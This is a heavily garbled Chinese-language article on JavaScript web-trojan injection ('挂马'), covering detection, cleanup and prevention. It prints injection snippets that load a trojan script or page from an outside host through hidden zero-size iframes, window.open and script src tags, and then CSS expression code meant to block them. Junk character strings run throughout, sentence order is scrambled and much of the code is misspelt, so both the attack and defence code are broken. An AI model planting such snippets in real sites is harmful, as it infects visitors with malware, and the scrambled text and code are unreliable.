网站被JS挂马解决方法

happyxp

网站被JS挂马解决方法

3 @2 T/ Y2 ?: |5 L/ ^

为什么网页挂马还是屡见不鲜？这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

IFRAME 和 JS 脚本挂马。

检测网页木马也是很重要的一项工作，目前流行的网站被黑，相应的 asp,

网站优化设计当中。htm,j 等文件中，插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

5 }' c/ W) [/ W0 ?) T4 X

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

/ d+ F! g F6 n5 z! I# t1 Z

相应的 asp, 目前流行的网站被黑。htm,j 等文件中，插入以 js 调用方式的

- u5 \9 M0 O( `% o) x. w

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

* O) F O2 Z! |; g3 u

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

。一千多位会员的 ID

; w0 k( I. y$ e' E: p

2: 如何检测网页是否被挂马。

; ?3 V) l/ b) {' z

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

因素。
2 googl 检测。>

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

打开你网站、博客，
4 人工检测。点击右键查看源文件，根据网页挂马的种类也可以查看是否中了木马。

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

1 e2 X2 m8 X8 d. u& \# s& w

" k0 d5 {$ F! r3 g* x3 g; s

3: 如何清除网页木马。

# @% O; h! J# i ^# t

就看那些文件是最近修改过的主要检查这些新文件， 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

5 u3 G, Y2 b0 c$ I2 ^( O

入源文件把相关的网页挂马种类的可疑代码删除。

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

/ ], W. B8 y1 a6 w) p! u

悉。>

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

2 保证你所使用的顺序及时的更新。

3 不要在前台网页上加注后台管理程序登陆页面的链接。

+ \# ?* s3 A w, H4 z5 \# ?4 N

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

' ~& i: U$ z1 Y/ {" o' ]! m

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

二项功能组合，
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

设置执行权限选项中，
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录，取消 ASP 运行权限。

9 g; @5 G. a' F7 z

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

IFRAME 挂马比较早， < IFRAME 挂马比较早。相应的预防措施也比较多，其中用 CSS 配合 JS 脚本进行预防是主流方式

。可这种预防方式也存在平安隐患， JS 脚本也可以被用来挂马，令人防不胜防。下面要介绍反击 JS 挂马的方法。

JS 挂马溯源

有经验的平安工程师也开始研究相应的对策，当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

法不时涌现，其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效，而黑客也发现。如果将木马挂在 JS 脚本中，所有调用该 JS

脚本的网页都等同于被挂上了木马，对于需要肉鸡群的黑客而言是一劳永逸，因此 JS 脚本挂马逐渐开始被黑客应用。

一种面向对象的脚本语言，小百科： JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

$ R& c- p' d0 l; C6 d

大家的 JavaScript 和 Java 除了语法上有一些相似之处，以及都能够当作网页的编程语言以外，两者是完全不相干的而

JavaScript 与 Jscript 也不同， Jscript 微软为了迎战 JavaScript 推出的脚本语言。

; y5 \& Q- h2 t2 e) y( A5 m- D

但是 JavaScript 一门具有丰富特性的语言，虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

程语言一样的复杂性。实际上，必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序，作为一名平安工程师，掌握 JS

+ L }3 p! s/ C: B; [

脚本在工作中会有很大的协助。

挂马原理一点通

2 b# F0 B, p! y, i. C# i5 p, h _

可以说优点多得数不过来， JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中，也可以

通过注入网页，让网站远程调取异地 JS 脚本。此外， JS 挂马插入 Web 页面的方法有几十种，绝对够菜鸟们眼花缭乱，

2 Z0 c; D0 g$ h; F; L$ V9 \

无从区分木马在何处。

, x0 S6 b v% }0 q

如同一个穿着鲜红颜色外衣的劫匪， IFRAME 挂马相对于安全工程师而言。招摇而扎眼，很容易被发现。但是利用 JS 挂

马就意味着这个劫匪拥有了一张可以随时变换的面孔，而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时，很

+ J. f$ p( Q0 Q; I* L

容易蒙混过关，导致木马久杀不绝。

JS 挂马攻防实录

9 Q, z1 K* G5 r5 ~& t) S

一种是直接将 JavaScript 脚本代码写在网页中，攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时，恶意的

8 I8 M# L! v9 ~- Q8 \ w8 Z

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口，隐藏地运行。

$ I& o$ |% w, {( ~2 }2 K. r9 u* o

这种方法使用的关键代码如下：

"",  window.open "http://www.v404.cn/ 木马

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

( \* F l0 ^" b+ K: q. b/ [7 @( @

, P( K- G q5 m8 H3 m; @

很容易被安全工程师发现，这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

但是设置为 0 后，可能会出现恶意代码不运行的情况。

6 f3 g1 o; L$ E' d! Y

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入： 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

document.writ ' ＜ Iframe src=" 网页木马地址 " ></ifram ＞ ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

。

( x, F* t5 t, Z

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

: ]' u' ^) T5 N

或者

8 \" q1 W) p+ e5 [ s% L3 ?

document.writ "<div style='display:none'>"

9 S1 S) m: ^1 T! }' y1 p

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

document.writ "</div>"
 

. p; p: v2 _2 F+ e: j0 |

就成功地将木马挂到对方的网页中了

例如黑客有可能会将脚本写为： 小提示：黑客还可以根据情况随机变换拔出的 JS 挂马方法。

3 m3 I$ {3 Y) k+ U3 \- M+ p

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

或者：

<ifram src="vbscript:[ 挂马脚本 ]">

5 J/ i: _# m) v: |% Z( M! i

! B- K. y' x3 ?' Y( B

等等 …

& \! d5 y/ z& C. Z

不方便，防第一种 JS 挂马方式。用得非常少，而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

就是阻止 Src 请求的异地外域的 JS 脚本，代码如下：

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

, h/ h8 j0 z, u0 Q% S

;}

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

0 A4 S) t# w5 j; b' D& \0 I7 r

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

/ `& y+ {" [) E" T9 y4 _4 s

这段代码会让异地外域的 JS 文件在使用 document.writ 时，所以我为安全工程师提供了一段可以中止 JS 脚本运行的

+ u% @, T( A1 d6 h& y, n% v

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完，只有局部被强制输出了

Writer 后面的内容再不会被写入访问者的电脑中，从而起到防范 JS 脚本挂马的作用。

<title> 让 JS 挂马中止的 CSS 代码 </title>

R8 U. @+ x0 Q$ D

<styl type="text/css" id="shudoo">

0 z5 B+ [: Z0 z+ l6 f

/*<![CDATA[*/

! g- g( q; y: t# x' t) W

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

/*]]>*/

</style>